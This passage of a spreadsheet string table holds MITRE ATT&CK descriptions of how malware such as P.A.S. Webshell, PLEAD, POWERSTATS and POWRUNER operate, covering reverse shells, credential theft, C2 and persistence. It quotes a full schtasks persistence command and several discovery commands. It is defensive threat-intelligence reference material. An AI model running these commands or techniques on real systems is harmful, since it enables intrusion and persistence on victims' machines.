    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses the filename owaauth.dll, which is a legitimate file that normally resides in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\&lt;/code&gt;; the malicious file by the same name is saved in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to timestop a file or directory.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). It is installed as an ISAPI filter on Exchange servers and shares characteristics with the [China Chopper](https://attack.mitre.org/software/S0020) Web shell.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to create reverse shells with Perl scripts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list and extract data from SQL databases.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to copy files on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use a decryption mechanism to process a user supplied password and allow execution.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can delete scripts from a subdirectory of /tmp after they are run.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list files and file characteristics including extension, size, ownership, and permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can upload and download files to and from compromised hosts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to modify file permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can display the /etc/passwd file on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can scan networks for open ports and listening services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use encryption and base64 encoding to hide strings and to enforce access control once deployed.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can list PHP server configuration details.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can gain remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) added junk data to outgoing UDP packets to peer implants.(Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can download additional payloads to a target system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can send randomly-generated data as part of its C2 communication.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can check for specific processes associated with virtual environments.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can check the compromised host for processes associated with VMware or VirtualBox environments.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) has the ability to "sleep" for a specified time to evade detection.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of manipulating the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) communicates via ICMP for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of creating reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>An older variant of [PLAINTEE](https://attack.mitre.org/software/S0254) performs UAC bypass.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) has downloaded and executed additional plugins.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses &lt;code&gt;reg add&lt;/code&gt; to add a Registry Run key for persistence.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) performs the &lt;code&gt;tasklist&lt;/code&gt; command to list running processes.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) gains persistence by adding the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) encodes C2 beacons using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) collects general system enumeration data about the infected machine and checks the OS version.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the victim’s IP address.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses cmd.exe to execute commands on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) can use `ShellExecute` to execute applications.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has used AOL Instant Messenger for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has been delivered through compromised sites acting as watering holes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can conduct file browsing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can perform screen capturing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can identify system information, including battery status.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) encrypts C2 traffic with AES and RSA.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uploads data in 2048-byte chunks.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a DGA to derive command and control URLs from a word list.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) downloads and executes additional PowerShell code and Windows binaries.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses PowerShell to execute various commands, one to execute its payload.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a WMI event subscription to establish persistence.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) has been observed being used to download [TEXTMATE](https://attack.mitre.org/software/S0146) and the Cobalt Strike Beacon payload onto victims.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>If the victim is using PowerShell 3.0 or later, [POWERSOURCE](https://attack.mitre.org/software/S0145) writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) queries Registry keys in preparation for setting Run keys to achieve persistence.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has encrypted C2 traffic with RSA.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can upload files from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can deobfuscate the main backdoor code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can disable Microsoft Office Protected View by changing Registry keys.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DDE to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has connected to C2 servers through proxies.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\, D:\, E:\ and, F:\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use JavaScript code for execution.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve usernames from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has created a scheduled task named "MicrosoftEdge" to establish persistence.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used &lt;code&gt;get_tasklist&lt;/code&gt; to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has established persistence through a scheduled task using the command &lt;code&gt;”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”&lt;/code&gt;.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can sleep for a given number of seconds.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has detected security tools.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) encoded C2 traffic with base64.(Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use WMI queries to retrieve data from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is written in PowerShell.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can install a Registry Run key for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has the ability to dump password hashes.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used AES for encrypting C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can use WMI for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use DNS for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect domain group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may enumerate user directories on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can download or upload files from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect local group information by running &lt;code&gt;net localgroup administrators&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect process information by running &lt;code&gt;tasklist&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) persists through a scheduled task that executes it every minute.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can capture a screenshot from a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use base64 encoded C2 communications.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the system by running &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect network configuration data by running &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can execute commands from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may use WMI when collecting information about a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can use an XOR key to decrypt a PowerShell loader and payload binary.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can inject its payload DLL Into memory.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can download additional payloads onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) is distributed as a set of encrypted files and scripts.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) can utilize a PowerShell loader.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can establish using a AppCertDLLs Registry key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has Gzipped information and saved it to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) to decode base64-encoded assembly.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can download additional files and payloads to compromised hosts.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather user names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has saved information to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has hashed most its code's functions and encrypted payloads with base64 and XOR.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has been observed using a Registry Run key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather AVs registered in the system.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using the LoadLibrary API.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather system information such as computer names.(Citation: Morphisec ShellTea June 2019)	</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) scrapes memory for properly formatted payment card data.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) aggregates collected data in a tmp file.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is loaded and executed by a highly obfuscated launcher.(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to disable Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use DLL side-loading to execute malicious payloads.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can write an encrypted token to the Registry to enable processing of remote commands.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to compress stings with QuickLZ.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can monitor processes on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can start and inject code into a new `svchost` process.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to install itself as a Windows service.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to encrypt communications with D3DES.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
